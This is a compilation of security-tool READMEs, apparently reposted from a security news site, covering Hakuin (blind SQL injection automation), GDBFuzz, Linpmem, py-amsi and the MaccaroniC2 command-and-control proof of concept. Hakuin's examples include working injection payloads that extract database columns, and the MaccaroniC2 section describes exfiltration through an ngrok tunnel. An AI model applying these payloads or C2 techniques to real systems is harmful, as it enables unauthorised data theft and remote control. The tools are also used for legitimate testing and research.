
Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

By: Zion3R


Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

Hakuin has been presented at esteemed academic and industrial conferences:

  • BlackHat MEA, Riyadh, 2023
  • Hack in the Box, Phuket, 2023
  • IEEE S&P Workshop on Offensive Technology (WOOT), 2023

More information can be found in our paper and slides.


Installation

To install Hakuin, simply run:

pip3 install hakuin

Developers should install the package locally and set the -e flag for editable mode:

git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from Requester and override the request method. The method must inject the query and return whether it resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        # Recent aiohttp versions have no module-level get(); use a ClientSession.
        async with aiohttp.ClientSession() as session:
            async with session.get(f'http://vuln.com/?n=XXX" OR ({query}) --') as r:
                return r.status == 200
Example 2 - Header Injection with Content-based Inference
class ContentRequester(Requester):
    async def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        async with aiohttp.ClientSession() as session:
            async with session.get('http://vuln.com/', headers=headers) as r:
                return 'found' in await r.text()

To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but more options will be added soon. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
    ...

async def main():
    # requester: Use this Requester
    # dbms: Use this DBMS
    # n_tasks: Spawns N tasks that extract column rows in parallel
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())

Now that everything is set up, you can start extracting DB metadata.

Example 1 - Extracting DB Schemas
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
Example 2 - Extracting Tables
tables = await ext.extract_table_names(strategy='model')
Example 3 - Extracting Columns
columns = await ext.extract_column_names(table='users', strategy='model')
Example 4 - Extracting Tables and Columns Together
metadata = await ext.extract_meta(strategy='model')

Once you know the structure, you can extract the actual content.

Example 1 - Extracting Generic Columns
# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns
res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns
res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns
res = await ext.extract_column_blob(table='users', column='id')
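
Putting the pieces together, the sketch below combines calls already shown above (using the StatusRequester from the earlier example); the target URL, table, and column names are illustrative placeholders.

import asyncio
import aiohttp
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite

class StatusRequester(Requester):
    async def request(self, ctx, query):
        # Placeholder injection point; adapt to the vulnerable parameter.
        async with aiohttp.ClientSession() as session:
            async with session.get(f'http://vuln.com/?n=XXX" OR ({query}) --') as r:
                return r.status == 200

async def main():
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    metadata = await ext.extract_meta(strategy='model')          # tables and columns
    addresses = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
    print(metadata, addresses)

if __name__ == '__main__':
    asyncio.run(main())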

More examples can be found in the tests directory.

Using Hakuin from the Command Line

Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

python3 hk.py -h

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}


GDBFuzz - Fuzzing Embedded Systems Using Hardware Breakpoints

By: Zion3R


This is the companion code for the paper 'Fuzzing Embedded Systems using Debugger Interfaces'. A preprint of the paper can be found at https://publications.cispa.saarland/3950/. The code allows users to reproduce and extend the results reported in the paper. Please cite the paper when reporting, reproducing, or extending the results.


Folder structure

.
├── benchmark # Scripts to build Google's fuzzer test suite and run experiments
├── dependencies # Contains a Makefile to install dependencies for GDBFuzz
├── evaluation # Raw experiment data presented in the paper
├── example_firmware # Embedded example applications, used for the evaluation
├── example_programs # Contains a compiled example program and configs to test GDBFuzz
├── src # Contains the implementation of GDBFuzz
├── Dockerfile # For creating a Docker image with all GDBFuzz dependencies installed
├── LICENSE # License
├── Makefile # Makefile for creating the Docker image or installing GDBFuzz locally
└── README.md # This README file

Purpose of the project

The idea of GDBFuzz is to leverage hardware breakpoints of microcontrollers as feedback for coverage-guided fuzzing. To this end, GDB is used as a generic interface to enable broad applicability. For binary analysis of the firmware, Ghidra is used. The code contains a benchmark setup for evaluating the method. Additionally, example firmware files are included.

Getting Started

GDBFuzz enables coverage-guided fuzzing for embedded systems, but - for evaluation purposes - can also fuzz arbitrary user applications. For fuzzing on microcontrollers we recommend a local installation of GDBFuzz so that fuzz data can be sent to the device under test reliably.

Install local

GDBFuzz has been tested on Ubuntu 20.04 LTS and Raspberry Pi OS 32-bit. Prerequisites are Java and Python 3. First, create a new virtual environment and install all dependencies.

virtualenv .venv
source .venv/bin/activate
make
chmod a+x ./src/GDBFuzz/main.py

Run locally on an example program

GDBFuzz reads settings from a config file with the following keys.

[SUT]
# Path to the binary file of the SUT.
# This can, for example, be an .elf file or a .bin file.
binary_file_path = <path>

# Address of the root node of the CFG.
# Breakpoints are placed at nodes of this CFG.
# e.g. 'LLVMFuzzerTestOneInput' or 'main'
entrypoint = <entrypoint>

# Number of inputs that must be executed without a breakpoint hit until
# breakpoints are rotated.
until_rotate_breakpoints = <number>


# Maximum number of breakpoints that can be placed at any given time.
max_breakpoints = <number>

# Blacklist functions that shall be ignored.
# ignore_functions is a space separated list of function names e.g. 'malloc free'.
ignore_functions = <space separated list>

# One of {Hardware, QEMU, SUTRunsOnHost}
# Hardware: An external component starts a gdb server and GDBFuzz can connect to this gdb server.
# QEMU: GDBFuzz starts QEMU. QEMU emulates binary_file_path and starts gdbserver.
# SUTRunsOnHost: GDBFuzz starts the target program within GDB.
target_mode = <mode>

# Set this to False if you want to start ghidra, analyze the SUT,
# and start the ghidra bridge server manually.
start_ghidra = True


# Space separated list of addresses where software breakpoints (for error
# handling code) are set. Execution of those is considered a crash.
# Example: software_breakpoint_addresses = 0x123 0x432
software_breakpoint_addresses =


# Whether all triggered software breakpoints are considered a crash
consider_sw_breakpoint_as_error = False

[SUTConnection]
# The class 'SUT_connection_class' in file 'SUT_connection_path' implements
# how inputs are sent to the SUT.
# Inputs can, for example, be sent over Wi-Fi, Serial, Bluetooth, ...
# This class must inherit from ./connections/SUTConnection.py.
# See ./connections/SUTConnection.py for more information.
SUT_connection_file = FIFOConnection.py

[GDB]
path_to_gdb = gdb-multiarch
# Written as address:port
gdb_server_address = localhost:4242

[Fuzzer]
# In Bytes
maximum_input_length = 100000
# In seconds
single_run_timeout = 20
# In seconds
total_runtime = 3600

# Optional
# Path to a directory where each file contains one seed. If you don't want to
# use seeds, leave the value empty.
seeds_directory =

[BreakpointStrategy]
# Strategies to choose basic blocks are located in
# 'src/GDBFuzz/breakpoint_strategies/'
# For the paper we use the following strategies
# 'RandomBasicBlockStrategy.py' - Randomly choosing unreached basic blocks
# 'RandomBasicBlockNoDomStrategy.py' - Like previous, but doesn't use dominance relations to derive transitively reached nodes.
# 'RandomBasicBlockNoCorpusStrategy.py' - Like first, but prevents growing the input corpus and therefore behaves like blackbox fuzzing with coverage measurement.
# 'BlackboxStrategy.py', - Doesn't set any breakpoints
breakpoint_strategy_file = RandomBasicBlockStrategy.py

[Dependencies]
path_to_qemu = dependencies/qemu/build/x86_64-linux-user/qemu-x86_64
path_to_ghidra = dependencies/ghidra


[LogsAndVisualizations]
# One of {DEBUG, INFO, WARNING, ERROR, CRITICAL}
loglevel = INFO

# Path to a directory where output files (e.g. graphs, logfiles) are stored.
output_directory = ./output

# If set to True, an MQTT client sends UI elements (e.g. graphs)
enable_UI = False
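
The [SUTConnection] section above points to a Python class that implements how fuzz inputs reach the SUT. Below is a hypothetical sketch of such a class; the base class lives in ./connections/SUTConnection.py and the method names used here are assumptions, so check that file for the actual interface before writing your own connection.

# Hypothetical sketch only -- method names are assumptions, see ./connections/SUTConnection.py
from connections.SUTConnection import SUTConnection

class MySerialConnection(SUTConnection):
    def connect(self):
        # e.g. open the serial port to the device under test
        ...

    def send_input(self, fuzz_input: bytes):
        # deliver one fuzzing input to the SUT, e.g. write it to the serial port
        ...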

An example config file is located in ./example_programs/ together with an example program that was compiled using our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common/. Start fuzzing for one hour with the following command.

chmod a+x ./example_programs/json-2017-02-12
./src/GDBFuzz/main.py --config ./example_programs/fuzz_json.cfg

We first see output from Ghidra analyzing the binary executable, and subsequently messages when breakpoints are relocated or hit.

Fuzzing Output

Depending on the specified output_directory in the config file, there should now be a folder trial-0 with the following structure

.
├── corpus # A folder that contains the input corpus.
├── crashes # A folder that contains crashing inputs - if any.
├── cfg # The control flow graph as adjacency list.
├── fuzzer_stats # Statistics of the fuzzing campaign.
├── plot_data # Table showing at which relative time in the fuzzing campaign which basic block was reached.
├── reverse_cfg # The reverse control flow graph.

Using Ghidra in GUI mode

By setting start_ghidra = False in the config file, GDBFuzz connects to a Ghidra instance running in GUI mode. In this case, the ghidra_bridge plugin needs to be started manually from the script manager. During fuzzing, reached program blocks are highlighted in green.

GDBFuzz on Linux user programs

For fuzzing Linux user applications, GDBFuzz leverages the standard LLVMFuzzerTestOneInput entrypoint that is used by almost all fuzzers such as AFL, AFL++, and libFuzzer. In benchmark/benchSUTs/GDBFuzz_wrapper/common there is a wrapper that can be used to compile any compliant fuzz harness into a standalone program that fetches input via a named pipe at /tmp/fromGDBFuzz. This makes it possible to simulate an embedded device that consumes data via a well-defined input interface and therefore to run GDBFuzz on any application. For convenience, we created a script in benchmark/benchSUTs that compiles all programs from our evaluation with our wrapper, as explained later.

NOTE: GDBFuzz is not intended to fuzz Linux user applications. Use AFL++ or other fuzzers for that purpose. The wrapper exists only for evaluation purposes, to enable running benchmarks and comparisons at scale!

Install and run in a Docker container

The general effectiveness of our approach is shown in a large-scale benchmark deployed as Docker containers.

make dockerimage

To run the above experiment in the Docker container (for one hour, as specified in the config file), map the example_programs and output folders as volumes and start GDBFuzz as follows.

chmod a+x ./example_programs/json-2017-02-12
docker run -it --env CONFIG_FILE=/example_programs/fuzz_json_docker_qemu.cfg -v $(pwd)/example_programs:/example_programs -v $(pwd)/output:/output gdbfuzz:1.0

An output folder should appear in the current working directory with the structure explained above.

Detailed Instructions

Our evaluation is split into two parts. 1. GDBFuzz in its intended setup, directly on the hardware. 2. GDBFuzz in an emulated environment to allow independent analysis and comparison of the results.

GDBFuzz can work with any GDB server and therefore most debug probes for microcontrollers.

GDBFuzz vs. Blackbox (RQ1)

Regarding RQ1 from the paper, we execute GDBFuzz on different microcontrollers with different firmware located in example_firmware. For each experiment we run GDBFuzz with the RandomBasicBlock and with the RandomBasicBlockNoCorpus strategy. The latter behaves like fuzzing without feedback, but we can still measure the achieved coverage. For answering RQ1, we compare the achieved coverage of the RandomBasicBlock and the RandomBasicBlockNoCorpus strategy. The respective config files are in the corresponding subfolders, and we now explain how to set up fuzzing on the four development boards.

GDBFuzz on STM32 B-L4S5I-IOT01A board

GDBFuzz requires access to a GDB Server. In this case the B-L4S5I-IOT01A and its on-board debugger are used. This on-board debugger sets up a GDB server via the 'st-util' program, and enables access to this GDB server via localhost:4242.

  • Install the STLINK driver
  • Connect the MCU board and the PC via USB (on the MCU board, use the USB connector labeled 'USB STLINK')
sudo apt-get install stlink-tools gdb-multiarch

Build and flash a firmware for the STM32 B-L4S5I-IOT01A, for example the arduinojson project.

Prerequisite: Install platformio (pio)

cd ./example_firmware/stm32_disco_arduinojson/
pio run --target upload

For your info: platformio stores an .elf file of the SUT at ./example_firmware/stm32_disco_arduinojson/.pio/build/disco_l4s5i_iot01a/firmware.elf. This .elf file is also used later in the user configuration for Ghidra.

Start a new terminal, and run the following to start a GDB server:

st-util

Run GDBFuzz with a user configuration for arduinojson. We can send data over the USB port to the microcontroller. The microcontroller forwards this data via serial to the SUT. In our case /dev/ttyACM0 is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyACM0 in the config file to your device.

./src/GDBFuzz/main.py --config ./example_firmware/stm32_disco_arduinojson/fuzz_serial_json.cfg

Fuzzer statistics and logs are in the ./output/... directory.

GDBFuzz on the CY8CKIT-062-WiFi-BT board

Install pyocd:

pip install --upgrade pip 'mbed-ls>=1.7.1' 'pyocd>=0.16'

Make sure that 'KitProg v3' is on the device and put the board into 'Arm DAPLink' mode by pressing the appropriate button. Start the GDB server:

pyocd gdbserver --persist

Flash a firmware and start fuzzing e.g. with

gdb-multiarch
target remote :3333
load ./example_firmware/CY8CKIT_json/mtb-example-psoc6-uart-transmit-receive.elf
monitor reset
./src/GDBFuzz/main.py --config ./example_firmware/CY8CKIT_json/fuzz_serial_json.cfg

GDBFuzz on ESP32 and Segger J-Link

Build and flash a firmware for the ESP32, for instance the arduinojson example with platformio.

cd ./example_firmware/esp32_arduinojson/
pio run --target upload

Add the following line to the OpenOCD config file for the J-Link debugger (jlink.cfg):

adapter speed 10000

Start a new terminal, and run the following to start the GDB Server:

get_idf
openocd -f interface/jlink.cfg -f target/esp32.cfg -c "telnet_port 7777" -c "gdb_port 8888"

Run GDBFuzz with a user configuration for arduinojson. We can send data over the USB port to the microcontroller. The microcontroller forwards this data via serial to the SUT. In our case /dev/ttyUSB0 is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyUSB0 in the config file to your device.

./src/GDBFuzz/main.py --config ./example_firmware/esp32_arduinojson/fuzz_serial.cfg

Fuzzer statistics and logs are in the ./output/... directory.

GDBFuzz on MSP430F5529LP

Install TI MSP430 GCC from https://www.ti.com/tool/MSP430-GCC-OPENSOURCE

Start GDB Server

./gdb_agent_console libmsp430.so

or (more stable) build mspdebug from https://github.com/dlbeer/mspdebug/ and use:

until mspdebug --fet-skip-close --force-reset tilib "opt gdb_loop True" gdb ; do sleep 1 ; done

Ghidra fails to analyze binaries for the TI MSP430 controller out of the box. To fix that, we import the file in the Ghidra GUI, choose MSP430X as the architecture, and skip the auto analysis. Next, we open the 'Symbol Table', sort the symbols by name, and delete all symbols with names like $C$L*. Now the auto analysis can be executed. After analysis, start the ghidra bridge from the Ghidra GUI manually and then start GDBFuzz.

./src/GDBFuzz/main.py --config ./example_firmware/msp430_arduinojson/fuzz_serial.cfg

USB Fuzzing

To access USB devices as a non-root user with pyusb, we add appropriate udev rules. Paste the following line into /etc/udev/rules.d/50-myusb.rules:

SUBSYSTEM=="usb", ATTRS{idVendor}=="1234", ATTRS{idProduct}=="5678" GROUP="usbusers", MODE="666"

Reload udev:

sudo udevadm control --reload
sudo udevadm trigger

Compare against Fuzzware (RQ2)

In RQ2 from the paper, we compare GDBFuzz against the emulation-based approach Fuzzware. First, we execute GDBFuzz and Fuzzware as described previously on the shipped firmware files. For each GDBFuzz experiment, we create a file with valid basic blocks from the control flow graph files as follows:

cut -d " " -f1 ./cfg > valid_bbs.txt

Now we can replay the coverage against the Fuzzware results:

fuzzware genstats --valid-bb-file valid_bbs.txt

Finding Bugs (RQ3)

When crashing or hanging inputs are found, they are stored in the crashes folder. During evaluation, we found the following three bugs:

  1. An infinite loop in the STM32 USB device stack, caused by a for loop that counts a uint8_t index variable up to an attacker-controllable uint32_t bound.
  2. A buffer overflow in the Cypress JSON parser, caused by missing length checks on a fixed size internal buffer.
  3. A null pointer dereference in the Cypress JSON parser, caused by missing validation checks.

GDBFuzz on a Raspberry Pi 4 (8 GB)

GDBFuzz can also run on a Raspberry Pi host with slight modifications:

  1. Ghidra must be modified such that it runs on a 32-bit OS.

In ./dependencies/ghidra/support/launch.sh (line 125), the JAVA_HOME variable must therefore be hardcoded, e.g. to JAVA_HOME="/usr/lib/jvm/default-java".

  2. STLink must be at version >= 1.7 to work properly; build it from source.

GDBFuzz on other boards

To fuzz software on other boards, GDBFuzz requires

  1. A microcontroller with hardware breakpoints and a GDB-compliant debug probe.
  2. The firmware file.
  3. A running GDB server and a suitable GDB application.
  4. An entry point where fuzzing should start, e.g. a parser function or an address.
  5. An input interface (see src/GDBFuzz/connections) that triggers execution of the code at the entry point, e.g. a serial connection.

All these properties need to be specified in the config file.

Run the full Benchmark (RQ4 - 8)

For RQ's 4 - 8 we run a large scale benchmark. First, build the Docker image as described previously and compile applications from Google's Fuzzer Test Suite with our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common.

cd ./benchmark/benchSUTs
chmod a+x setup_benchmark_SUTs.py
make dockerbenchmarkimage

Next, adapt the benchmark settings in benchmark/scripts/benchmark.py and benchmark/scripts/benchmark_aflpp.py to your needs (especially number_of_cores, trials, and seconds_per_trial) and start the benchmark with:

cd ./benchmark/scripts
./benchmark.py $(pwd)/../benchSUTs/SUTs/ SUTs.json
./benchmark_aflpp.py $(pwd)/../benchSUTs/SUTs/ SUTs.json

A folder appears in ./benchmark/scripts that contains plot files (coverage over time), fuzzer statistic files, and control flow graph files for each experiment as in evaluation/fuzzer_test_suite_qemu_runs.

[Optional] Install Visualization and Visualization Example

GDBFuzz has an optional feature where it plots the control flow graph of covered nodes. This is disabled by default. You can enable it by following the instructions of this section and setting 'enable_UI' to 'True' in the user configuration.

On the host:

Install

sudo apt-get install graphviz

Install a recent version of Node.js, for example via Option 2 from here (use Option 2, not Option 1). This should install both node and npm. For reference, our version numbers are below (newer versions should work too):

➜ node --version
v16.9.1
➜ npm --version
7.21.1

Install web UI dependencies:

cd ./src/webui
npm install

Install mosquitto MQTT broker, e.g. see here

Update the mosquitto broker config: Replace the file /etc/mosquitto/conf.d/mosquitto.conf with the following content:

listener 1883
allow_anonymous true

listener 9001
protocol websockets

Restart the mosquitto broker:

sudo service mosquitto restart

Check that the mosquitto broker is running:

sudo service mosquitto status

The output should include the text 'Active: active (running)'

Start the web UI:

cd ./src/webui
npm start

Your web browser should open automatically on 'http://localhost:3000/'.

Start GDBFuzz with a user config file where enable_UI is set to True. You can use the Docker container and the arduinojson SUT from above; just make sure 'enable_UI' is set to 'True'.

Covered nodes are shown in blue; white nodes are not covered. We only show uncovered nodes whose parent is covered (drawing the complete control flow graph takes too much time if it is large).



Linpmem - A Physical Memory Acquisition Tool For Linux

By: Zion3R


Like its Windows counterpart, Winpmem, this is not a traditional memory dumper. Linpmem offers an API for reading from any physical address, including reserved memory and memory holes, but it can also be used for normal memory dumping. Furthermore, the driver offers a variety of access modes to read physical memory, such as byte, word, dword, qword, and buffer access mode, where buffer access mode is appropriate in most standard cases. If reading requires an aligned byte/word/dword/qword read, Linpmem will do precisely that.

Currently, Linpmem features:

  1. Read from physical address (access mode byte, word, dword, qword, or buffer)
  2. CR3 info service (specify target process by pid)
  3. Virtual to physical address translation service

Cache control is to be added in the future to support the specialized read access modes.


Building the kernel driver

At least for now, you must compile the Linpmem driver yourself. A method to load a precompiled Linpmem driver on other Linux systems is in the works but not finished yet. That said, compiling the Linpmem driver is not difficult; it basically amounts to executing 'make'.

Step 1 - getting the right headers

You need make and a C compiler. (We recommend gcc, but clang should work as well).

Make sure that you have the linux-headers installed (using whatever package manager your target linux distro has). The exact package name may vary on your distribution. A quick (distro-independent) way to check if you have the package installed:

ls -l /usr/lib/modules/`uname -r`/

That's it, you can proceed to step 2.

Foreign system: Currently, if you want to compile the driver for another system, e.g., because you want to create a memory dump but can't compile on the target, you have to download the header package directly from the package repositories of that system's Linux distribution. Double-check that the package version exactly matches the release and kernel version running on the foreign system. In case the other system is using a self-compiled kernel you have to obtain a copy of that kernel's build directory. Then, place the location of either directory in the KDIR environment variable.

export KDIR=path/to/extracted/header/package/or/kernel/root

Step 2 - make

Compiling the driver is simple, just type:

make

This should produce linpmem.ko in the current working directory.

You might want to check precompiler.h beforehand and choose whether to compile for release or debug (e.g., with debug printing). There aren't many other precompiler settings right now.

Loading The Driver

The linpmem.ko module can be loaded by using insmod path-to-linpmem.ko, and unloaded with rmmod path-to-linpmem.ko. (This will load the driver only for this uptime.) If you compiled for debug, also take a look at dmesg.

After loading, for talking to the driver, you need to create the device:

mknod /dev/linpmem c 42 0

If you can't talk to the driver, check the dmesg log to verify that '42' was indeed the registered major:

[12827.900168] linpmem: registered chrdev with major 42

Usually, though, the kernel will assign exactly this requested number.

You can use chown on the device to give it to your user, if you do not want to have a root console open all the time. (Or just keep using it in a root console.)

  • Watch dmesg output. Please report errors if you see any!
  • Warning: if there is a dmesg error print from Linpmem telling to reboot, better do it immediately.
  • Warning: this is an early version.

Usage

Demo Code

There is an example code demonstrating and explaining (in detail) how to interact with the driver. The user-space API reference can furthermore be found in ./userspace_interface/linpmem_shared.h.

  1. cd demo
  2. gcc -o test test.c
  3. (sudo) ./test // <= you need sudo if you did not use chown on the device.

This code is important, if you want to understand how to directly interact with the driver instead of using a library. It can also be used as a short function test.

Command Line Interface Tool

There is an (optional) basic command line interface tool to Linpmem, the pmem CLI tool. It can be found here: https://github.com/vobst/linpmem-cli. Aside from the source code, there is also a precompiled CLI tool as well as the precompiled static library and headers that can be found here (signed). Note: this is a preliminary version, be sure to check for updates, as many additions and enhancements will follow soon.

The pmem CLI tool can be used for testing the various functions of Linpmem in a (relatively) safe and convenient manner. Linpmem can also be loaded by this tool instead of using insmod/rmmod, with some extra options in future. This also has the advantage that pmem auto-creates the right device for you for immediate use. It is extremely portable and runs on any Linux system (and, in fact, has been tested even on a Linux 2.6).

$ ./pmem -h
Command-line client for the linpmem driver

Usage: pmem [OPTIONS] [COMMAND]

Commands:
insmod Load the linpmem driver
help Print this message or the help of the given subcommand(s)

Options:
-a, --address <ADDRESS> Address for physical read operations
-v, --virt-address <VIRT_ADDRESS> Translate address in target process' address space (default: current process)
-s, --size <SIZE> Size of buffer read operations
-m, --mode <MODE> Access mode for read operations [possible values: byte, word, dword, qword, buffer]
-p, --pid <PID> Target process for cr3 info and virtual-to-physical translations
--cr3 Query cr3 value of target process (default: current process)
--verbose Display debug output
-h, --help Print help (see more with '--help')
-V, --version Print version

If you want to compile the CLI tool yourself, change to its directory and follow the instructions in the (cli) Readme to build it. Otherwise, just download the prebuilt program; it should work on any Linux. To load the kernel driver with the CLI tool:

# pmem insmod path/to/linpmem.ko

The advantage of using the pmem tool to load the driver is that you do not have to create the device file yourself, and in upcoming releases it will offer a way to choose who owns the linpmem device.

Libraries

The pmem command line interface is only a thin wrapper around a small Rust library that exposes an API for interfacing with the driver. More advanced users can also use this library. The library is automatically compiled (as static portable library) along with the pmem cli tool when compiling from https://github.com/vobst/linpmem-cli, but also included (precompiled) here (signed). Note: this is a preliminary version, more to follow soon.

If you do not want to use the usermode library and prefer to interface with the driver directly on your own, you can find its user-space API/interface and documentation in ./userspace_interface/linpmem_shared.h. We also provide example code in demo/test.c that explains how to use the driver directly.

Memdumping tool

Not implemented yet.

Tested Linux Distributions

  • Debian, self-compiled 6.4.X, Qemu/KVM, not paravirtualized.
    • PTI: off/on
  • Debian 12, Qemu/KVM, fully paravirtualized.
    • PTI: on
  • Ubuntu server, Qemu/KVM, not paravirtualized.
    • PTI: on
  • Fedora 38, Qemu/KVM, fully paravirtualized.
    • PTI: on
  • Baremetal Linux test, AMI BIOS: Linux 6.4.4
    • PTI: on
  • Baremetal Linux test, HP: Linux 6.4.4
    • PTI: on
  • Baremetal, Arch[-hardened], Dell BIOS, Linux 6.4.X
  • Baremetal, Debian, 6.1.X
  • Baremetal, Ubuntu 20.04 with Secure Boot on. Works, but sign driver first.
  • Baremetal, Ubuntu 22.04, Linux 6.2.X

Handling Secure Boot

If the system reports the following error message when loading the module, it might be because of secure boot:

$ sudo insmod linpmem.ko
insmod: ERROR: could not insert module linpmem.ko: Operation not permitted

There are different ways to still load the module. The obvious one is to disable secure boot in your UEFI settings.

If your distribution supports it, a more elegant solution would be to sign the module before using it. This can be done using the following steps (tested on Ubuntu 20.04).

  1. Install mokutil:
    $ sudo apt install mokutil
  2. Create the signing key material:
    $ openssl req -new -newkey rsa:4096 -keyout mok-signing.key -out mok-signing.crt -outform DER -days 365 -nodes -subj "/CN=Some descriptive name/"
    Make sure to adjust the options to your needs. Especially, consider the key length (-newkey), the validity (-days), the option to set a key pass phrase (-nodes; leave it out, if you want to set a pass phrase), and the common name to include into the certificate (-subj).
  3. Register the new MOK:
    $ sudo mokutil --import mok-signing.crt
    You will be asked for a password, which is required in the following step. Consider using a password that you can type on a US keyboard layout.
  4. Reboot the system. It will enter a MOK enrollment menu. Follow the instructions to enroll your new key.
  5. Sign the module. Once the MOK is enrolled, you can sign your module:
    $ /usr/src/linux-headers-$(uname -r)/scripts/sign-file sha256 path/to/mok-signing.key path/to/mok-signing.crt path/to/linpmem.ko

After that, you should be able to load the module.

Note that from a forensic-readiness perspective, you should prepare a signed module before you need it, as the system will reboot twice during the process described above, destroying most of your volatile data in memory.

Known Issues

  • Huge page read is not implemented. Linpmem recognizes a huge page and rejects the read, for now.
  • Reading from mapped I/O and DMA space will be done with CPU caching enabled.
  • No locks are taken during the page table walk. This might lead to funny results when concurrent modifications are going on. This is a general (and mostly unsolvable) problem of live RAM reading without halting the entire OS.
  • Secure Boot (Ubuntu): please sign your driver prior to using.
  • Any CPU-powered memory encryption, e.g., AMD SME, Intel SGX/TDX, ...
  • Pluton chips?

(Please report potential issues if you encounter anything.)

Under work

  • Loading precompiled driver on any Linux.
  • Processor cache control. Example: for uncached reading of mapped I/O and DMA space.

Future work

  • Arm/Mips support. (far future work)
  • Legacy kernels (such as 2.6), unix-based kernels

Acknowledgements

Linpmem, as well as Winpmem, would not exist without the work of our predecessors of the (now retired) REKALL project: https://github.com/google/rekall.

  • We would like to thank Mike Cohen and Johannes StΓΌttgen for their pioneer work and open source contribution on PTE remapping, a technique which is still in use 10 years later.

Our open source contributors:

  • Viviane Zwanger
  • Valentin Obst


Py-Amsi - Scan Strings Or Files For Malware Using The Windows Antimalware Scan Interface

By: Zion3R


py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender; antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to perform antivirus scans in Python. Read more about the Windows AMSI API here.


Installation

  • Via pip

    pip install pyamsi
  • Clone repository

    git clone https://github.com/Tomiwa-Ot/py-amsi.git
    cd py-amsi/
    python setup.py install

Usage

from pyamsi import Amsi

# Scan a file
Amsi.scan_file(file_path, debug=True) # debug is optional and False by default

# Scan string
Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default

# Both functions return a dictionary of the format
# {
# 'Sample Size' : 68, // The string/file size in bytes
# 'Risk Level' : 0, // The risk level as suggested by the antivirus
# 'Message' : 'File is clean' // Response message
# }
Risk Level Meaning
0 AMSI_RESULT_CLEAN (File is clean)
1 AMSI_RESULT_NOT_DETECTED (No threat detected)
16384 AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator)
20479 AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator)
32768 AMSI_RESULT_DETECTED (File is considered malware)
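
A minimal usage sketch based on the functions and dictionary format documented above (the scanned string is just an arbitrary example):

from pyamsi import Amsi

result = Amsi.scan_string('Write-Host "hello"', 'sample_script')

# Interpret the result using the risk levels listed above.
if result['Risk Level'] >= 32768:      # AMSI_RESULT_DETECTED
    print('Flagged as malware:', result['Message'])
elif result['Risk Level'] == 0:        # AMSI_RESULT_CLEAN
    print('Clean:', result['Message'])
else:
    print('Risk level', result['Risk Level'], '-', result['Message'])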

Docs

https://tomiwa-ot.github.io/py-amsi/index.html



MaccaroniC2 - A PoC Command And Control Framework That Utilizes The Powerful AsyncSSH

By: Zion3R


MaccaroniC2 is a proof-of-concept Command and Control framework that utilizes the powerful AsyncSSH Python library, which provides an asynchronous client and server implementation of the SSHv2 protocol, and uses the PyNgrok wrapper for ngrok integration. This tool is designed for a specific scenario in which the victim runs the AsyncSSH server and establishes a tunnel to the outside, ready to receive commands from the attacker.

The attacker leverages the Ngrok official API to retrieve the hostname and port of the tunnel to establish a connection. This approach takes advantage of the comprehensive capabilities provided by AsyncSSH, including its integrated support for SFTP and SCP, facilitating secure and efficient data exfiltration and more.

Moreover, the attacker can send and execute system commands through a SOCKS proxy, for example using Tor to enhance anonymity.

  • A free Ngrok account only allows one tunnel at a time. With some changes, this tool could be turned into a bot-like C&C framework that controls multiple SSH instances, but you would need to upgrade your plan on the Ngrok website; see https://ngrok.com/pricing

Setup and Procedure

